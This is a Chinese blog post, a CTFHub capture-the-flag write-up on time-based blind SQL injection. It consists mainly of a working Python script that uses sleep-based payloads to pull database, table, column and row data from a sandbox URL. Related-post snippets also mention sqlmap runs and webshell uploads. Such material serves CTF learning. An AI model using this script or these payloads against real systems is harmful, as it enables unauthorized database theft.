CTFHub-时间盲注-wp #(自制脚本做法)

最新推荐文章于 2022-04-25 16:08:32 发布
最新推荐文章于 2022-04-25 16:08:32 发布
阅读量5.1k 收藏 2
点赞数
分类专栏: CTFHub-wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37450949/article/details/116902071
版权

时间盲注脚本

# -*- coding: utf-8 -*-
# @Time : 2021/5/16 19:29
# @Author : z1moq
# @File : ctfhub时间盲注.py
# @Software: PyCharm
import requests
import string
import time

def get_database(url):
    database = ''
    for i in range(1, 9):
        for j in string.ascii_letters:
            target = url + 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
            time1 = time.time()
            request = requests.get(target)
            time2 = time.time()
            if time2 - time1 > 2:
                database += j
                print(database)
                break
    print('Database:', database)
    return database


def get_table(url, database):
    tablesname = []
    for i in range(0, 2):
        name = ''
        for j in range(1, 6):
            for k in string.ascii_letters:
                target = url + 'if(substr((select table_name from information_schema.tables where table_schema="' +\
                         database + '" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
                time1 = time.time()
                request = requests.get(target)
                time2 = time.time()
                if time2 - time1 > 2:
                    name += k
                    print(name)
                    break
        tablesname.append(name)
    print('Tablesame:', tablesname)
    return input("Choose TableName:")


def get_columns(url, tablename, database):
    columns = []
    for i in range(0, 3):
        name = ''
        for j in range(1, 6):
            for k in string.ascii_letters:
                target = url + 'if(substr((select column_name from information_schema.columns where table_name="'\
                         + tablename + '" and table_schema="' + database\
                         + '" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
                time1 = time.time()
                request = requests.get(target)
                time2 = time.time()
                if time2 - time1 > 2:
                    name += k
                    print(name)
                    break
        columns.append(name)
    print('Columnsname:', columns)
    return input("Choose Columnname:")

def getdata(url, tablename, database, columns):
    data = ''
    for i in range(0, 50):
        for j in string.digits\
                 + string.ascii_letters\
                 + string.punctuation:
            target = url + 'if(substr((select '\
                      +columns\
                      + ' from ' + tablename\
                      + '),%d,1)="%s",sleep(3),1)' % (i, j)
            time1 = time.time()
            request = requests.get(target)
            time2 = time.time()
            if time2 - time1 > 2:
                data += j
                print(data)
                break
    print(data)

if __name__ == "__main__":
    url = "http://challenge-71506a2f58c546c4.sandbox.ctfhub.com:10080/?id="
    database = get_database(url)
    tablename = get_table(url, database)
    columns=get_columns(url, tablename, database)
    getdata(url, tablename, database,columns)
不想弹solo
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web安全:SQL注入之时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 2156
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
CtfHub-wp(web)
最新发布
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
WP插件-站长必备免费WP插件
qq_787143156的博客
01-18 2551
如何利用WP插件做好SEO(搜索引擎优化)作为寻找新客户的关键策略。通过创建满足搜索条件并回答您的潜在客户提出的问题的内容,您就有机会赢得网站访问者并赢得他们的信任,SEO提供了丰富的见解、涉及链接构建、搜索引擎排名和关键字访问量。 利用WP插件可以为提高网站搜索引擎排名,如果您希望您的网站在Google、百度、Bing和Yahoo结果页面中快速轻松地出现,当您定期向网站介绍新的SEO内容时,搜素引擎会奖励您的努力和关心。如果网站与搜索字词相关且相关,则获得一致流量的几率会大大提高,并且可以理解.
Android 智能指针详解 -- wp
私房菜
12-21 1万+
上一篇关于sp的博文,通过 source code 来解释了sp的功能,sp被称为强指针,但是强引用更贴切点。那么弱引用wp到底有什么功能?与sp有什么区别?这一篇通过 source code 来解释。
WordPress详细安装步骤
seo吧
07-22 1万+
本文介绍WordPress(WP)安装方法,虽然很多IDC都会主动帮站长安装,安装过程也很简单,但毕竟是接触WordPress的开始,WP博客做的如何或多或少决定于您对WordPress了解的如何,天缘之前很少写WordPress文章,现在就从最简单的安装开始。WordPress作为极为优秀的PHP开源个人信息平台,已得到大部分站长的认同,虽然天缘博客没有使用WordPress,主要是因为Word
wp使用笔记
zhangleifly——梦起飞的地方
05-08 2077
CTFHUB SQL注入——时间盲注 附自己写的脚本
wuuconix's blog
08-28 2299
介绍 时间盲注和上一篇布尔盲注一样都是盲注,都需要借助length,ascii,substr这些神奇的函数来猜测各项信息。它们的差别是猜测成功的依据。 布尔盲注的话如果查询有结果,一般会有一个success_flag,比如在上一题里就会返回query successfully。我的脚本也就是request返回值里有没有这个文本来判断是否查询成功的。 但是时间盲注不一样,它不光不给你查询的内容的回显,不给你报错信息,甚至连布尔盲注里的success_flag也不给你。也就是什么情况呢?你在那里查询,它什么信息
CTF-7#GET THE PASS!-WP
10-23
CTF-7#GET THE PASS!-WP 本文将详细介绍 CTF-7#GET THE PASS!WP 竞赛的解决方案,包括工具的使用、上传和执行、获取管理员账户名和密码、修改 ACL 权限、打开文件和获取 flag 等。 一、工具介绍 在本次 CTF ...
CTF-6#SYSTEM!POWER!-WP
10-23
CTF WP SYSTEM!POWER! CTF(Capture The Flag)竞赛题目6#SYSTEM!POWER!的WP(Write-up)解析。 CTF WP CTF竞赛是信息安全领域中的一种比赛形式,旨在评估参与者的安全技能。WP是Write-up的缩写,指的是CTF...
CTF-5#进击!拿到Web最高权限-WP
10-23
CTF/Web安全/ WP最高权限获取 CTF(Capture The Flag)是一种信息安全竞赛形式,目的是为了让参与者通过解决各种挑战和谜题来获取 Flags,证明自己的信息安全能力。WP(Web)是CTF中的一种挑战形式,旨在让参与者...
wp-pot-cli:通过cli运行wp-pot脚本
02-05
在这里做:安装$ npm install --global wp-pot-cli用法$ wp-pot --help Generate pot-files for WordPress localization Usage $ wp-pot <options> Options --bug-report, -b Header with URL for reporting ...
史上最详细sql注入wp
热门推荐
lyy0xfff的博客
07-26 2万+
文章目录sql注入wp(史上最详细)前言什么是SQL注入?SQL注入的原理常见的注入方式常见绕过技巧常见防控SQL注入的方法手工查询语句Basic ChallengesLess-1 **Error Based- String**Less-2 Error **Based- Integer**Less-3 Error Based- String (with Twist)Less-4 Error Based- DoubleQuotes String@@Less-5 Double Query- Single Quo
CTFHub-布尔/时间盲注-wp #(sqlmap做法)
z1moq的博客
05-15 3076
布尔盲注/时间盲注(sqlmap做法) 使用 python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" --banner 扫描网站 发现存在漏洞 使用 python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" --current-db 跑出库名 使用 pyth
HECTF2021 WP(部分)
weixin_49764009的博客
11-17 2106
crypto RSA_e_n 维纳攻击 from RSAwienerHacker import hack_RSA import binascii,gmpy2 e=0x14b367bf01efd4dc667b8e62975479c612c96e78f7f1f55242b2973c882ddcb33a65c52174d8ae1273764ce429054ea3f2fdc38ff205443c92ef4198739f05aa11fc10d3fc6ff30c8f5f05a04f43e3d8fc9bfffe916b2
2019 moeCTF新生题 部分wp
xiaohuihui的博客
09-15 1万+
author: xiaohuihui statis:持续更新 这篇博客是博主参加moeCTF后写的WP,一方面记录一下,另一方面分享部分心得给广大互联网的朋友。题目附件可以去 moectf 官方网站 下载,也可以留邮箱。后期可能会放出网盘链接。本 blog尽可能收录所有赛题,标题中带有 × 的表示博主尚未解出。
CTF-时间盲注专题
PolarPeak的博客
04-25 2517
文章目录参考时间盲注Heavy QueryGet_lock()Rlikesleep2019hgame-week3-sqli2 `sleep`benchmark题pwnhub全宇宙最最简单的PHP博客系统 `Get_lock() Heavy Query` 参考 时间盲注 Heavy Query 个人认为这个方法是本题的最优解 原理就如方法的名字:大负荷查询 即用到一些消耗资源的方式让数据库的查询时间尽量变长 而消耗数据库资源的最有效的方式就是让两个大表做笛卡尔积,这样就可以让数据库的查询慢下来 而最后找到系统
CTFHub技能树笔记之WEB-SQL:时间盲注
weixin_48799157的博客
04-08 3957
小白一个,如有错误请指正 这里使用两种解法 1.python脚本 2.sqlmap 一、需要用到的函数: length() //返回字符串的长度 ascii() //返回一个字符的ascii码值 substr(字符串,开始位置,截取数量)//截取字符串 sleep() //时间注入的核心函数 if(判断语句,语句一,语句二) ...
WordPress程序代码块高亮显示插件wp-syntax使用
wuxuhui19930209的博客
05-10 2667
WordPress程序代码块高亮显示插件wp-syntax使用 文章来源:http://www.wpdaxue.com/wp-syntax.html 1 2 3 //高亮代码内容.... 其中,lang=”html”表示代码语言为html,请根据自己需要修改; line=”1″ 表示显示行号,如果不需要,去掉即可;escaped=”
wp(学习总结)
qq_63162684的博客
12-12 8770
三.变量类型 概述:变量类型是指保存在该变量中的数据类型 php对变量类型看的比较淡 1.变量类型简介 1)bool(布尔型) 表达true或false,即真或假 $a=true; var_dump($a); ...
ctfhub 全部WP
09-22
引用:MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。 它是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类。 常见的MME类型,例如:   超文本标记语言文本 .html,html text/htm   普通文本 .txt text/plain   RTF文本 .rtf application/rtf   GIF图形 .gif image/gif   JPEG图形 .jpg image/jpeg 上传包含一句话木马的php文件,然后使用burp抓包,修改数据包的content type为image/gif(注意是第二个content type)发送到repeater修改后,点击send,然后放包,即可显示上传php文件成功后的相对路径。使用蚁剑连接该一句话木马即可获得flag。 文件头检查 。 引用: htaccess 查看网页源码,可以看到常用的文件后缀都被禁用。根据题目的提示,.hatccess文件【.htaccess是Apache服务器的一个配置文件。它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面,改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】 前提:mod_rewrite模块开启,配置文件中LoadMoudle rewrite_module module modules/mod_rewrite.so AllowOverride All,配置文件中AllowOverride All (如果可能做题过程中结果出现问题,但步骤正确,可以看看前提是否正确) 。 引用:文件头检验 是当浏览器在上传文件到服务器的时候,服务器对所上传文件的Content-Type类型进行检测。如果是白名单允许的,则可以正常上传,否则上传失败。 当我们尝试上传一句话木马的php文件,出现了正确后缀类型的弹窗。使用010editor制作一张图片木马,上传时使用burp抓包把文件后缀改为php,然后点击send。使用蚁剑连接php文件,即可在对应目录下找到flag。 00截断 。 关于ctfhub的全部WP,很抱歉我无法提供相关信息。由于ctfhub是一个综合性的CTF平台,涵盖了大量的题目和解题思路,每个题目的WP都有着不同的内容和解法。如果您对特定的题目或解题方法感兴趣,我可以为您提供更多信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不想弹solo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值